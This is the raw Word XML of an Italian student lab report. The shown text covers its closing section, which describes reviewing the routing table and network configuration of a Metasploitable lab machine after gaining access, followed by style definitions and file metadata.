        <w:t>- Questo mi ha permesso di visualizzare la tabella di routing, mostrando come i pacchetti sono instradati all'interno e all'esterno della macchina.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conclusione e Raccomandazioni</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Dopo aver ottenuto accesso alla macchina Metasploitable e raccolto le informazioni di configurazione di rete e di routing, ho analizzato questi dati per comprendere meglio le potenziali vulnerabilità e la topologia di rete della macchina vittima. Le informazioni raccolte possono essere utilizzate per ulteriori analisi di sicurezza o per prendere misure preventive contro attacchi futuri.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276"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 w:name="Arial Black">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it-IT" w:eastAsia="en-US" w:bidi="ar-SA"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titolo1Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00232d5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olo2Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00232d5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olo3Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00232d5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olo4Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00232d5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olo5Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00232d5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olo6Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00232d5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olo7Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00232d5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olo8Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00232d5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olo9Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00232d5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232d59"/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:eastAsia="" w:cs="" w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:color w:themeColor="accent1" w:themeShade="bf" w:val="0F4761"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Titolo2Carattere" w:customStyle="1">
    <w:name w:val="Titolo 2 Carattere"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00232d59"/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:eastAsia="" w:cs="" w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:color w:themeColor="accent1" w:themeShade="bf" w:val="0F4761"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Titolo3Carattere" w:customStyle="1">
    <w:name w:val="Titolo 3 Carattere"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00232d59"/>
    <w:rPr>
      <w:rFonts w:eastAsia="" w:cs="" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:color w:themeColor="accent1" w:themeShade="bf" w:val="0F4761"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Titolo4Carattere" w:customStyle="1">
    <w:name w:val="Titolo 4 Carattere"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00232d59"/>
    <w:rPr>
      <w:rFonts w:eastAsia="" w:cs="" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:i/>
      <w:iCs/>
      <w:color w:themeColor="accent1" w:themeShade="bf" w:val="0F4761"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Titolo5Carattere" w:customStyle="1">
    <w:name w:val="Titolo 5 Carattere"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00232d59"/>
    <w:rPr>
      <w:rFonts w:eastAsia="" w:cs="" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:color w:themeColor="accent1" w:themeShade="bf" w:val="0F4761"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Titolo6Carattere" w:customStyle="1">
    <w:name w:val="Titolo 6 Carattere"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00232d59"/>
    <w:rPr>
      <w:rFonts w:eastAsia="" w:cs="" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:i/>
      <w:iCs/>
      <w:color w:themeColor="text1" w:themeTint="a6" w:val="595959"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Titolo7Carattere" w:customStyle="1">
    <w:name w:val="Titolo 7 Carattere"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00232d59"/>
    <w:rPr>
      <w:rFonts w:eastAsia="" w:cs="" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:color w:themeColor="text1" w:themeTint="a6" w:val="595959"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Titolo8Carattere" w:customStyle="1">
    <w:name w:val="Titolo 8 Carattere"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00232d59"/>
    <w:rPr>
      <w:rFonts w:eastAsia="" w:cs="" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:i/>
      <w:iCs/>
      <w:color w:themeColor="text1" w:themeTint="d8" w:val="272727"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Titolo9Carattere" w:customStyle="1">
    <w:name w:val="Titolo 9 Carattere"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00232d59"/>
    <w:rPr>
      <w:rFonts w:eastAsia="" w:cs="" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:color w:themeColor="text1" w:themeTint="d8" w:val="272727"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="TitoloCarattere" w:customStyle="1">
    <w:name w:val="Titolo Carattere"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00232d59"/>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uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="00232d59"/>
    <w:rPr>
      <w:rFonts w:eastAsia="" w:cs="" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:color w:themeColor="text1" w:themeTint="a6" w:val="595959"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CitazioneCarattere" w:customStyle="1">
    <w:name w:val="Citazione Carattere"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="00232d59"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:themeColor="text1" w:themeTint="bf" w:val="404040"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00232d59"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:themeColor="accent1" w:themeShade="bf" w:val="0F4761"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CitazioneintensaCarattere" w:customStyle="1">
    <w:name w:val="Citazione intensa Carattere"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="IntenseQuote"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00232d59"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:themeColor="accent1" w:themeShade="bf" w:val="0F4761"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00232d59"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:themeColor="accent1" w:themeShade="bf" w:val="0F4761"/>
      <w:spacing w:val="5"/>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le">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitoloCarattere"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00232d5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232d59"/>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zioneCarattere"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="00232d59"/>
    <w:pPr>
      <w:spacing w:before="160" w:after="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:themeColor="text1" w:themeTint="bf" w:val="404040"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00232d59"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="160"/>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="CitazioneintensaCarattere"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00232d5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61</TotalTime>
  <Application>LibreOffice/24.2.3.2$Windows_X86_64 LibreOffice_project/433d9c2ded56988e8a90e6b2e771ee4e6a5ab2ba</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>5</Pages>
  <Words>415</Words>
  <Characters>2544</Characters>
  <CharactersWithSpaces>3002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2024-05-22T07:57:00Z</dcterms:created>
  <dc:creator>Michele Covi</dc:creator>
  <dc:description/>
  <dc:language>it-IT</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-24T10:06:16Z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